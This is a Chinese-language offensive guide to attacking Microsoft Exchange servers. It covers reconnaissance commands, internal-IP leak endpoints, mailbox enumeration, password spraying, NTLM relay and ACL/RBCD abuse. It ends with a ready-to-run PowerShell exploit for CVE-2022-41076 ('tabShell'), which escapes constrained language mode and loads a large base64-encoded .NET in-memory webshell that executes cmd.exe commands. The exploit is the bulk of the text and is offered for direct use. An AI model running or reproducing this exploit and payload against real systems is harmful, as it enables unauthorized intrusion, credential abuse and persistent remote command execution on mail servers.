前期的一些操作
1
确定Exchange的位置
通过扫描SPN和端口扫描确定exchange在域中的位置,或者通过mail+domain、autodiscover+domain的方式也能快速定位exchange。
nmap -T3 -sVC -n -sT -Pn -p 80,443 --script http-ntlm-info.nse --script-args http-ntlm-info.root=/ews/
内网IP泄露
例如owa、ews和ecp接口被访问时,如果将http协议降级到1.0并取消host内容响应包就会返回内网IP地址、如下接口都可以泄露内网ip。
/Microsoft-Server-ActiveSync/default.eas
/Microsoft-Server-ActiveSync
/Autodiscover/Autodiscover.xml
/Autodiscover
/Exchange
/Rpc
/EWS/Exchange.asmx
/EWS/Services.wsdl
/EWS
/ecp
/OAB
/OWA
/aspnet_client
/PowerShell
网上已经有师傅写了脚本了,主要是exchage访问一些接口响应头会返回一些相关信息。
MSF
接口信息
exchange有很多可以进行身份验证的接口,并且大部分接口都是基于http的ntlm认证(支持pth)。所以接口就是用来给我们爆破邮箱的,但是实际情况下一些接口可能会被禁用,这时只需要通过其他接口进行爆破邮箱即可。爆破exchange:用户枚举->密码喷洒/hash碰撞,也就是先获取到用户邮箱然后通过密码喷洒或者hahs碰撞的方式拿到凭据。
/autoDiscover/ 自Exchange Server 2007开始推出的一项自动服务,用于自动配置用户在Outlook中邮箱的相关设置,简化用户登陆使用邮箱的流程。
/ecp "Exchange Control Panel" Exchange管理中心,管理员用于管理组织中的Exchange的Web控制台
/ews "Exchange Web Services" Exchange Web Service,实现客户端与服务端之间基于HTTP的SOAP交互
/mapi Outlook连接Exchange的默认方式,在2013和2013之后开始使用,2010 sp2同样支持
/microsoft-Server-ActiveSync 用于移动应用程序访问电子邮件
/OAB "Offline Address Book" 用于为Outlook客户端提供地址簿的副本,减轻Exchange的负担
/owa "Outlook Web APP" Exchange owa 接口,用于通过web应用程序访问邮件、日历、任务和联系人等
/powerShell 用于服务器管理的Exchange管理控制台 kerberos认证
/Rpc 早期的Outlook还使用称为Outlook Anywhere的RPC交互
/Microsoft-Server-ActiveSync
Autodiscover 这个接口可以接收xml请求。主要也是用来进行信息搜集,比如用户枚举。除了会返回 oab.xml 地址外,还会返回域控地址
EWS 可以用来指定搜索条件获取 GAL,PTH
OAB 地址集合列表的副本,构造包访问
/Autodiscover 获取具体的 /OAB/xxx/oab.xml,然后下载其中的 .lzx 文件,最后通过 oabextract 解析后得到其中的 SMTP 地址信息。
OWA 可以查看所有人的邮箱地址
RPC 它下面的接口的 [MS-OXNSPI] 协议可以 pth 域机器账户
Microsoft-Server-ActiveSync 用来访问域内共享服务
github上的两款工具可以进行爆破,就不截图了,注意的就是exchange邮箱登录的方式由管理员设置,可以是:[email protected]、user或者user/domain这样的格式,爆破的时候都加上。
2
Exchange的一些攻击手段
分为有凭据和无凭据两种情况:如果没有凭据就只能通过枚举爆破的方式来获取邮箱账号然后翻邮件或者钓鱼。有邮箱凭据的话就代表你有了一个域账号。(有的域账号可能不会开启邮箱,但开启了邮箱的账号一定是域账号.....)就可以结合历史漏洞进行攻击exchange,也可以通过翻邮件、邮件钓鱼、密码喷洒、查询ldap、nopac、adcs等等方式进行横向。
exchange的攻击方式除了官方爆出的几个漏洞之外,就是通过ntlmrelay进行攻击(CVE-2023-23397发送邮件触发UNC获取NTLM-HASH)或者通过查询域内的acl配置获取对exchange具有write的用户凭据设置rbcd或者其他形式的acl滥用来获取exchange权限。(例如发现了域用户A对exchange的机器用户具有write权限。就可以利用A配置B到exchange的rbcd控制exchange。)
当目标用户使用了outlook客户端进行接收邮件时,outlook会自动渲染邮件源的html内容,导致即使目标用户不点击查看邮件内容也会触发ntlm认证。(钓鱼)
如果exchange开启了webclient可以通过触发 MS-RPRN 或 MS-EFSRPC 认证请求,需要域凭据来调⽤RPC, 不过EFSRPC在2016以下某些情况不⽤凭据也可以。
3
tabShell注入内存马
Exchange的历史漏洞特别多,复现一下tabShell。前面说到exchange上面安装了Exchange Management Shell,结合CVE-2022-41076可以远程加载dll注入.net内存马 ,将下面代码保存成ps脚本执行即可
$secureString = ConvertTo-SecureString -String "admin123." -AsPlainText -Force
$UserCredential = New-Object System.Management.Automation.PSCredential -ArgumentList "red\vs01", $secureString
$version = New-Object -TypeName System.Version -ArgumentList "2.0"
$mytable = $PSversionTable
$mytable["WSManStackVersion"] = $version
$sessionOption = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck -ApplicationArguments @{PSversionTable=$mytable}
$Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri http://ex-01.red.net.cn/powershell -Credential $UserCredential -Authentication Kerberos -AllowRedirection -SessionOption $sessionOption
Enter-PSSession $Session
TabExpansion -line ";../../../../Windows/Microsoft.NET/assembly/GAC_MSIL/Microsoft.PowerShell.Commands.Utility/v4.0_3.0.0.0__31bf3856ad364e35/Microsoft.PowerShell.Commands.Utility.dll\Invoke-Expression" -lastWord "-test"
invoke-expression "`$ExecutionContext.SessionState.LanguageMode"
invoke-expression "`$ExecutionContext.SessionState.LanguageMode='FullLanguage'"
$x1="TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAA9GvmMAAAAAAAAAAOAAAiELAQsAACQAAAAGAAAAAAAALkIAAAAgAAAAYAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACgAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAANhBAABTAAAAAGAAAKgCAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAANCIAAAAgAAAAJAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAKgCAAAAYAAAAAQAAAAmAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAIAAAAACAAAAKgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAQQgAAAAAAAEgAAAACAAUADCsAAMwWAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
$x2="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMwAgApAAAAAQAAEQAoAwAACgoU/gYGAAAGcwQAAApzBQAACgsWKAYAAAoABwZvBwAACgAqAAAAEzACADEAAAABAAARAigIAAAKAAAoAwAACgoU/gYGAAAGcwQAAApzBQAACgsWKAYAAAoABwZvBwAACgAAKgAAABswBACHAAAAAgAAEQAAcgEAAHAKBigJAAAKEwURBS0yACgKAAAKAm8LAAAKCwYYcwwAAAoMCAcWB45pbw0AAAoACG8OAAAKAAhvDwAACgAAKykABhdzEAAACg0ACQJvEQAACgAA3hIJFP4BEwURBS0HCW8SAAAKANwAAADeExMEAHIXAABwEQQoEwAACgAA3gAAKgABHAAAAgBPAAxbABIAAAAAAAABAHFyABMTAAABEzAEAJYAAAADAAARAAJvFAAACgJvFQAACnMWAAAKbxcAAAoKcxgAAAoLBheNFgAAARMIEQgWHyadEQhvGQAACgwACBMJFhMKK0IRCREKmg0ACReNFgAAARMIEQgWHz2dEQhvGQAAChMEEQQWmhMFEQQXmigaAAAKEwYHEQURBm8bAAAKAAARChdYEwoRChEJjmn+BBMLEQstsAcTBysAEQcq+gACbxwAAAofGnJFAABwbx0AAAoAAm8cAAAKHwxyaQAAcG8dAAAKAAJvHAAACnKbAABwcrUAAHBvHgAACgAqAAAAGzAHAFYIAAAEAAARAHMfAA"
$x3="AKCgAoIAAAChMjESMtBgDdOwgAAHLFAABwC3LNAABwDHLXAABwDXIiBABwEwQGbyEAAAoRBG8iAAAKAAZvIwAACgAJKCQAAAoTBXMlAAAKKAoAAAoHbwsAAAooJgAACignAAAKclQEAHByWAQAcG8oAAAKbykAAAoWHxBvKgAAChMGcyUAAAooCgAACggRBigrAAAKbwsAAAooJgAACignAAAKclQEAHByWAQAcG8oAAAKEwdzLAAAChMIcy0AAAoTCThKBwAAAAZvLgAAChMKEQpvLwAAChMLEQpvMAAAChMMEQwoBQAABgAUEw0AAhT+ARMjESMtDAACdQcAAAETDgArSAByWAQAcBELbzEAAApvMgAAChELbzMAAApvMgAACnM0AAAKEw8RDG81AAAKczYAAAoTEBEQczcAAAoTEREPERFzOAAAChMOABELbzkAAApyWgQAcG86AAAKExIREnJkBABwKDsAAAoW/gETIxEjLVIAKDwAAApycAQAcG8LAAAKExMRDCDIAAAAbz0AAAoAEQwRE45pam8+AAAKABEMbzUAAAoTDRENERMWEROOaW8NAAAKABENbw8AAAoAADi6BQAAERJydgQAcCg7AAAKLBYRC28/AAAKcn4EAHAoOwAAChb+ASsBFwATIxEjOtUAAAAAEQsoBAAABhMUc0AAAAoTFREVb0EAAApyiAQAcG9CAAAKABEVb0EAAApymAQAcBEUCG9DAAAKKCsAAApvRAAAC"
$x4="gARFW9BAAAKFm9FAAAKABEVb0EAAAoXb0YAAAoAERVvQQAAChdvRwAACgARFW9IAAAKJig8AAAKERVvSQAACm8XAAAKERVvSgAACm8XAAAKKCsAAApvCwAAChMWEQwgyAAAAG89AAAKABEMERaOaWpvPgAACgARDG81AAAKEw0RDREWFhEWjmlvDQAACgAAOLYEAAAREnKgBABwKDsAAAosFhELbz8AAApyfgQAcCg7AAAKFv4BKwEXABMjESM6cAIAAAARCygEAAAGExQRFAhvQwAACigkAAAKExZzSwAACigKAAAKEQZvCwAACigKAAAKEQZvCwAACm9MAAAKERYWERaOaW9NAAAKExYRC29OAAAKcrAEAHBvTwAAChMXERcU/gEW/gETIxEjOtAAAAAAKFAAAAoTGNAfAAABKFEAAApy1AQAcBeNMwAAARMkESQW0AMAABsoUQAACqIRJChSAAAKFBeNAQAAARMlESUWERaiESVvUwAACnQfAAABExkRCBIY/hYyAAABbzIAAAoRGW9UAAAKABEMcrAEAHASGP4WMgAAAW8yAAAKc1UAAApvVgAACgAoPAAACnJYBABwbwsAAAoTExEMIMgAAABvPQAACgARDBETjmlqbz4AAAoAEQxvNQAAChMNEQ0RExYRE45pbw0AAAoAADgtAQAAABEIERdvVwAACm9YAAAKExpzWQAAChMbfgEAAAQtJx8Q0B8AAAEoUQAACtACAAACKFEAAAoo"
$x5="WgAACihbAAAKgAEAAAQrAH4BAAAEe1wAAAp+AQAABBEab10AAApy3gQAcG9eAAAKExwRHBEbb18AAAomERwRDm9fAAAKJhEcERZvXwAACiYRHG8yAAAKJhEbb2AAAAoTHREbb2EAAAoAEQwgyAAAAG89AAAKABEHFh8QbyoAAApzSwAACigKAAAKEQZvCwAACigKAAAKEQZvCwAACm9iAAAKER0WER2OaW9NAAAKKGMAAAoRBx8Qb2QAAAooZQAAChMeKGYAAAoRHm8LAAAKEx8RDBEfjmlqbz4AAAoAEQxvNQAAChMNEQ0RHxYRH45pbw0AAAoAAAA4FwIAABEScuQEAHAoOwAACiwfEQtvPwAACnJ+BABwKDsAAAosDBELb2cAAAoW/gErARcAEyMRIzqrAQAAABELbzkAAApy9AQAcG9oAAAKKGkAAAoTIBEgjTwAAAETIRELbxQAAAoRIRYRIG9qAAAKJnNLAAAKKAoAAAoRBm8LAAAKKAoAAAoRBm8LAAAKb0wAAAoRIRYRIY5pb00AAAoTFhEJchIFAHBvawAAChT+ARb+ARMjESMtWwARCXISBQBw0B8AAAEoUQAACnLUBABwF40zAAABEyQRJBbQAwAAGyhRAAAKohEkKFIAAAoUF40BAAABEyURJRYRFqIRJW9TAAAKdB8AAAFvbAAACgAAONEAAAAAEQlyEgUAcG9rAAAKdB8AAAFy3gQAcG9eAAAKExxzWQAAChMbERwRG29"
$x6="fAAAKJhEcEQ5vXwAACiYRHBEWb18AAAomERxvMgAACiYRG29gAAAKEx0RG29hAAAKABEdjmkW/gIW/gETIxEjLWQAc0sAAAooCgAAChEGbwsAAAooCgAAChEGbwsAAApvYgAAChEdFhEdjmlvTQAAChMdEQwgyAAAAG89AAAKABEMbzUAAAoTDREMER2OaWpvPgAACgARDREdFhEdjmlvDQAACgAAAAArNAARDCCUAQAAbz0AAAoAEQwRBY5pam8+AAAKABEMbzUAAAoTDRENEQUWEQWOaW8NAAAKAAAA3k8TIgARDCCUAQAAbz0AAAoAEQwRBY5pam8+AAAKABEMbzUAAAoTDRENEQUWEQWOaW8NAAAKAHIiBQBwESJvMgAACigrAAAKKG0AAAoAAN4AAN46ABENFP4BEyMRIy0SABENbw4AAAoAEQ1vDwAACgAAEQxvNQAACm8OAAAKABEMbzUAAApvDwAACgAA3AAAFxMjOK74//8TIgBySgUAcBEibzIAAAooKwAACihtAAAKAAZvbgAAChb+ARMjESMtCQAGb28AAAoAAADeAAAAKgAAQUwAAAAAAADyAAAAlgYAAIgHAABPAAAAEwAAAQIAAADyAAAA6AYAANoHAAA6AAAAAAAAAAAAAAAHAAAAFwgAAB4IAAA1AAAAEwAAAUJTSkIBAAEAAAAAAAwAAAB2NC4wLjMwMzE5AAAAAAUAbAAAAKwFAAAjfgAAGAYAAEgIAAAjU3RyaW"
$x7="5ncwAAAABgDgAAdAUAACNVUwDUEwAAEAAAACNHVUlEAAAA5BMAAOgCAAAjQmxvYgAAAAAAAAACAAABVxUCCAkCAAAA+iUzABYAAAEAAAA9AAAAAwAAAAEAAAAGAAAABQAAAHAAAAADAAAABAAAAAUAAAABAAAABQAAAAEAAAAAAAoAAQAAAAAABgA1AC4ABgBmAEsACgB+AHMACgCdAHMABgAEAeQABgAkAeQADgBWAUsBBgB/AW4BBgCYAW4BBgC1AasBBgDNAcEBBgDrAasBBgD2AasBBgD/AasBBgAYAqsBBgAlAqsBBgA6Ai4ABgBOAi4ABgBWAi4ABgCEAqsBBgCRAqsBBgCmAi4ABgCrAi4ADgC4AksBCgDSAnMACgDyAnMACgAoAwkDEgBkA+QABgBvAy4AEgB2A+QABgCRA38DCgClA3MACgDCA3MABgDsAy4ABgAiBAUEBgA7BAUEBgBVBC4ABgCfBIwECgCpBHMACgDhBC4ADgD9BEsBDgAaBUsBCgCKBXcFCgCSBXcFBgA6BgUEBgBKBgUEBgBdBgUECgCSBnMACgCvBnMABgC2Bi4ABgDDBi4ABgDIBi4ABgDsBn8DBgABB38DBgAnB6sBFgBkB0UHEgBrB+QAFgB6B0UHBgD3By4ABgADCC4ABgArCOQAAAAAAAEAAAAAAAEAAQABABAAFwAAAAUAAQABAIMBEAA8AwAABQABAAcAFgCaA/wAUCAAAAAAkQA8AAoAAQCII"
$x8="AAAAACGGEEAEAACAMggAAAAAJYARwAUAAIAeCEAAAAAlgCSABkAAwAaIgAAAACWALIAJAAEAFwiAAAAAJYAwAAqAAUAAAABAMkAAAABAM4AAAABANMAAAABANsAAAABAOAAKQBBAC8AMQBBABAAOQBiAT0AQQBBAEIASQBBAEgASQCfAU4ASQClAVMACQBBABAAUQC6AV8AWQDWAWQAWQDiAWkAYQBBAG8AcQAGAnYAcQAMAhAAcQASAhAAeQBBAH4AgQAwAoQAiQBGAhAAkQAwAokAGQBgApwAGQBwAqEAoQBBAKYAqQCcAq4ADABBABAAuQCyArkAwQDEAsAADADOAsUAIQDmAuoAyQAFA+8A2QDOAvYAAQFBABAAAQGyAwsBAQHfAw8BCQHOAoQAAQGlARAAEQH0AxUBGQFBABAAIQFJBBsBKQFiBCIBuQBrBCgBuQBzBK4AuQB7BC4BuQCFBDQBFABBABAAMQFBABAAAQG9BEEBOQHIBEcBOQHUBEwBGQDlBFEBCQBiBK4AGQDtBFcBSQFBAFwBIQAJBZwAeQBBAGMBUQFBAGkBOQBBAG8BGQDmAlcB2QAnBXkBuQAwBX4BWQA8BWQAIQBFBS8AIQBUBYQBGQBoBa4AWQFBABAAWQGjBYkBYQGxBYQADAAnBY8BYQG+BYQAYQHMBZYBYQHgBZYBYQH7BZYBWQGlAZsBWQEVBp8BWQEoBp8BaQFBABAAcQFuBqQBeQF+Bq4BGQCjBrcB"
$x9="gQEnBb0BkQG7BsQBmQHaBsoBmQH3BtYBsQEMB+EBFADOAsUAiQFBAPYAIQATB+gBiQEdB64AFAAnBY8BuQFBABAAwQHsA+8BJACMBwwCJACTBxgCLAAMByYC+QCaBy8CCQCpBzQCuQGwBzkCcQBGAhAAcQG4B6QBEQHIByIBuQB7BD4CuQCFBEMCWQDXB2QAGQDhB5sB2QDzB3kB2QH9B0oCcQAICE8CMQEnBVcCMQENCFwCkQAwAhQAAQEWCJsBAQEmCBAA6QFBABAALgALAL0CLgATAMYCYwCDA7gCWACPAM0AYgKyADoB0wH+ARwCBIAAAAAAAAAAAAAAAAAAAAAAQgEAAAQAAAAAAAAAAAAAAAEAJQAAAAAABAAAAAAAAAAAAAAAAQAuAAAAAAAEAAAAAAAAAAAAAAA0AEsBAAAAAAQAAAAAAAAAAAAAAAEAWAMAAAAABAAAAAAAAAAAAAAANAA0BwAAAAADAAIAAAAAAAA8TW9kdWxlPgBtZW1zaGVsbC5kbGwAU2hhcnBNZW1zaGVsbABtc2NvcmxpYgBTeXN0ZW0AT2JqZWN0AE1haW4ALmN0b3IAbG9nAFN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljAERpY3Rpb25hcnlgMgBTeXN0ZW0uTmV0AEh0dHBMaXN0ZW5lclJlcXVlc3QAcGFyc2VfcG9zdABIdHRwTGlzdGVuZXJSZXNwb25zZQBTZXRSZXNwSGVhZGVyAExpc3R"
$x10="lbmVyAGFyZ3MAZGF0YQByZXF1ZXN0AHJlc3AAY3R4AFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBtZW1zaGVsbABTeXN0ZW0uV2ViAEh0dHBDb250ZXh0AGdldF9DdXJyZW50AFN5c3RlbS5UaHJlYWRpbmcAUGFyYW1ldGVyaXplZFRocmVhZFN0YXJ0AFRocmVhZABTbGVlcABTdGFydABTeXN0ZW0uSU8ARmlsZQBFeGlzdHMAU3lzdGVtLlRleHQARW5jb2RpbmcAZ2V0X0RlZmF1bHQAR2V0Qnl0ZXMARmlsZVN0cmVhbQBGaWxlTW9kZQBTdHJlYW0AV3JpdGUARmx1c2gAQ2xvc2UAU3RyZWFtV3JpdGVyAFRleHRXcml0ZXIAV3JpdGVMaW5lAElEaXNwb3NhYmxlAERpc3Bvc2UAQ29uc29sZQBFeGNlcHRpb24AZ2V0X0lucHV0U3RyZWFtAGdldF9Db250ZW50RW5jb2RpbmcAU3RyZWFtUmVhZGVyAFRleHRSZWFkZXIAUmVhZFRvRW5kAENoYXIAU3RyaW5nAFNwbGl0AEh0dHBVdGlsaXR5AFVybERlY29kZQBBZGQAV2ViSGVhZGVyQ29sbGVjdGlvbgBnZXRfSGVhZGVycwBIdHRwUmVzcG"
$x11="9uc2VIZWFkZXIAU2V0AFN5c3RlbS5Db2xsZWN0aW9ucy5TcGVjaWFsaXplZABOYW1lVmFsdWVDb2xsZWN0aW9uADxMaXN0ZW5lcj5vX19TaXRlQ29udGFpbmVyMABTeXN0ZW0uQ29yZQBDYWxsU2l0ZWAxAEZ1bmNgMwBDYWxsU2l0ZQBTeXN0ZW0uUmVmbGVjdGlvbgBBc3NlbWJseQA8PnBfX1NpdGUxAEh0dHBMaXN0ZW5lcgBnZXRfSXNTdXBwb3J0ZWQASHR0cExpc3RlbmVyUHJlZml4Q29sbGVjdGlvbgBnZXRfUHJlZml4ZXMAQ29udmVydABGcm9tQmFzZTY0U3RyaW5nAFN5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkATUQ1Q3J5cHRvU2VydmljZVByb3ZpZGVyAEhhc2hBbGdvcml0aG0AQ29tcHV0ZUhhc2gAQml0Q29udmVydGVyAFRvU3RyaW5nAFJlcGxhY2UAVG9Mb3dlcgBTdWJzdHJpbmcAQ29uY2F0AFN5c3RlbS5Db2xsZWN0aW9ucwBIYXNodGFibGUASHR0cExpc3RlbmVyQ29udGV4dABHZXRDb250ZXh0AGdldF9SZXF1ZXN0AGdldF9SZXNwb25zZQBVcmkAZ2V0X1VybABnZXRfUXVlcnlTdHJpbmcASHR0cFJlcXVlc3QAZ2V0X091dHB1dFN0cmVhbQBIdHRwUmVzcG9uc2UAZ2V0X0l0ZW0Ab"
$x12="3BfRXF1YWxpdHkAZ2V0X1VURjgAc2V0X1N0YXR1c0NvZGUAc2V0X0NvbnRlbnRMZW5ndGg2NABnZXRfSHR0cE1ldGhvZABTeXN0ZW0uRGlhZ25vc3RpY3MAUHJvY2VzcwBQcm9jZXNzU3RhcnRJbmZvAGdldF9TdGFydEluZm8Ac2V0X0ZpbGVOYW1lAHNldF9Bcmd1bWVudHMAc2V0X1VzZVNoZWxsRXhlY3V0ZQBzZXRfUmVkaXJlY3RTdGFuZGFyZE91dHB1dABzZXRfUmVkaXJlY3RTdGFuZGFyZEVycm9yAGdldF9TdGFuZGFyZE91dHB1dABnZXRfU3RhbmRhcmRFcnJvcgBSaWpuZGFlbE1hbmFnZWQAU3ltbWV0cmljQWxnb3JpdGhtAElDcnlwdG9UcmFuc2Zvcm0AQ3JlYXRlRGVjcnlwdG9yAFRyYW5zZm9ybUZpbmFsQmxvY2sAQ29va2llQ29sbGVjdGlvbgBnZXRfQ29va2llcwBDb29raWUAR3VpZABOZXdHdWlkAFR5cGUAUnVudGltZVR5cGVIYW5kbGUAR2V0VHlwZUZyb21IYW5kbGUATWV0aG9kSW5mbwBHZXRNZXRob2QATWV0aG9kQmFzZQBJbnZva2UAU2V0Q29va2llAGdldF9WYWx1ZQBNZW1vcnlTdHJlYW0ATWljcm9zb2Z0LkNTaGFycABNaWNyb3NvZnQuQ1NoYXJwLlJ1bnRpbWVCaW5kZXIAQmlu"
$x13="ZGVyAENhbGxTaXRlQmluZGVyAENTaGFycEJpbmRlckZsYWdzAENyZWF0ZQBUYXJnZXQAQ3JlYXRlSW5zdGFuY2UARXF1YWxzAFRvQXJyYXkAQ3JlYXRlRW5jcnlwdG9yAFRvQmFzZTY0U3RyaW5nAGdldF9BU0NJSQBnZXRfSGFzRW50aXR5Qm9keQBHZXQASW50MzIAUGFyc2UAQnl0ZQBSZWFkAHNldF9JdGVtAGdldF9Jc0xpc3RlbmluZwBTdG9wAENvbXBpbGVyR2VuZXJhdGVkQXR0cmlidXRlAAAAABVjADoAXABsAG8AZwAuAHQAeAB0AAAtTABvAGcAIABlAHIAcgBvAHIAIQAgAEUAcgByAG8AcgA6ACAACgB7ADAAfQAAI00AaQBjAHIAbwBzAG8AZgB0AC0ASQBJAFMALwA4AC4ANQABMXQAZQB4AHQALwBoAHQAbQBsADsAIABjAGgAYQByAHMAZQB0AD0AdQB0AGYALQA4AAEZWAAtAFAAbwB3AGUAcgBlAGQALQBCAHkAAQ9BAFMAUAAuAE4ARQBUAAAHawBlAHkAAAlwAGEAcwBzAACDSVAAQwBGAEUAVAAwAE4AVQBXAFYAQgBGAEkARQBoAFUAVABVAHcAZwBVAEYAVgBDAFQARQBsAEQASQBDAEkAdABMAHkAOQBYAE0AMABNAHYATAAwAFIAVQBSAEMAQgBJAFYARQAxAE0ASQBEAFEAdQBNAEQARQB2AEwAMAB"
$x14="WAE8ASQBpAEoAbwBkAEgAUgB3AE8AaQA4AHYAZAAzAGQAMwBMAG4AYwB6AEwAbQA5AHkAWgB5ADkAVQBVAGkAOQBvAGQARwAxAHMATgBDADkAegBkAEgASgBwAFkAMwBRAHUAWgBIAFIAawBJAGoANABOAEMAagB4AEkAVgBFADEATQBQAGoAeABJAFIAVQBGAEUAUABqAHgAVQBTAFYAUgBNAFIAVAA1AE8AYgAzAFEAZwBSAG0AOQAxAGIAbQBRADgATAAxAFIASgBWAEUAeABGAFAAZwAwAEsAUABFADEARgBWAEUARQBnAFMARgBSAFUAVQBDADEARgBVAFYAVgBKAFYAagAwAGkAUQAyADkAdQBkAEcAVgB1AGQAQwAxAFUAZQBYAEIAbABJAGkAQgBEAGIAMgA1ADAAWgBXADUAMABQAFMASgAwAFoAWABoADAATAAyAGgAMABiAFcAdwA3AEkARwBOAG8AWQBYAEoAegBaAFgAUQA5AGQAWABNAHQAWQBYAE4AagBhAFcAawBpAFAAagB3AHYAUwBFAFYAQgBSAEQANABOAEMAagB4AEMAVAAwAFIAWgBQAGoAeABvAE0AagA1AE8AYgAzAFEAZwBSAG0AOQAxAGIAbQBRADgATAAyAGcAeQBQAGcAMABLAFAARwBoAHkAUABqAHgAdwBQAGsAaABVAFYARgBBAGcAUgBYAEoAeQBiADMASQBnAE4ARABBADAATABpAEIAVQBhAE"
$x15="cAVQBnAGMAbQBWAHgAZABXAFYAegBkAEcAVgBrAEkASABKAGwAYwAyADkAMQBjAG0ATgBsAEkARwBsAHoASQBHADUAdgBkAEMAQgBtAGIAMwBWAHUAWgBDADQAOABMADMAQQArAEQAUQBvADgATAAwAEoAUABSAEYAawArAFAAQwA5AEkAVgBFADEATQBQAGcAMABLAAAxaAB0AHQAcAA6AC8ALwAqADoAOAAwAC8AZgBhAHYAaQBjAG8AbgAuAGkAYwBvAC8AAAMtAAEBAAlUAHkAcABlAAALcAByAGkAbgB0AAAFTwBLAAAHYwBtAGQAAAlQAE8AUwBUAAAPYwBtAGQALgBlAHgAZQAABy8AYwAgAAAPbQBlAG0AXwBiADYANAAAI0EAUwBQAC4ATgBFAFQAXwBTAGUAcwBzAGkAbwBuAEkAZAAACUwAbwBhAGQAAAVMAFkAAA9tAGUAbQBfAHIAYQB3AAAdQwBvAG4AdABlAG4AdAAtAEwAZQBuAGcAdABoAAEPcABhAHkAbABvAGEAZAAAJ0UAeABjAGUAcAB0AGkAbwBuACAAYwBhAHUAZwBoAHQAMQA6ACAAACdFAHgAYwBlAHAAdABpAG8AbgAgAGMAYQB1AGcAaAB0ADIAOgAgAAAAAGHMJ9CIpjtMullr+Qcp8L4ACLd6XFYZNOCJBQABAR0OAyAAAQQAAQEOCgABFRIJAg4OEg0FAAEBEhEEAAEBHAQgAQEICLA/X38R1Qo6B"
$x16="AAAEh0FIAIBHBgFIAEBEiEEAAEBCAQgAQEcBgcCEh0SJQQAAQIOBAAAEi0FIAEdBQ4GIAIBDhE1ByADAR0FCAgFIAIBDgIEIAEBDgUAAgEOHAwHBg4dBRIxEj0STQIEIAASOQQgABItByACARI5Ei0DIAAOBhUSCQIODgYgAR0OHQMEAAEODgcgAgETABMBHAcMDhUSCQIODh0ODh0ODg4VEgkCDg4dAx0OCAIEIAASZQYgAgERaQ4FIAIBDg4OBhUScQEVEnUDEnkcEn0DAAACBSAAEoCFBQABHQUOBiABHQUdBQUAAQ4dBQUgAg4ODgUgAg4ICAUAAg4ODgYVEgkCDhwFIAASgJ0EIAASDQQgABIRBSAAEoChBCAAEm0GIAMBDg4OBSABARI5BSABARJBCSACARKApRKAqQQgAQ4OBQACAg4OBCABAQoFIAASgLEGIAETARMABCABAQIDIAACBCAAElEJIAISgL0dBR0FCCADHQUdBQgIBSAAEoDBBiABEoDFDgUAABGAyQgAARKAzRGA0QIdBQogAhKA1Q4dEoDNBiACHBwdHAYgAQESgMUOAAMSgOURgOkSgM0SgM0NFRJxARUSdQMSeRwSfQsAARUScQETABKA5QMGEwAJFRJ1AxJ5HBJ9CCACEwITABMBBCABHA4EIAECHAQgAB0FBCABDggGAAMODg4OBAABCA4HIAMIHQUICAQgARwcBSACARwcVQcmEoCBDg4ODh0FDg4VEgkC"
$x17="DhwSgJkSgJ0SDRIREjkSHRKApRI9EoCpDh0FFRIJAg4OEoCtHQUSgMURgMkSfRwSgN0cHQUOHQUIHQUSTQIdEoDNHRwEAQAAAAgBAAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEAAAAAQgAAAAAAAAAAAAAeQgAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEEIAAAAAAAAAAAAAAAAAAAAAX0NvckRsbE1haW4AbXNjb3JlZS5kbGwAAAAAAP8lACAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
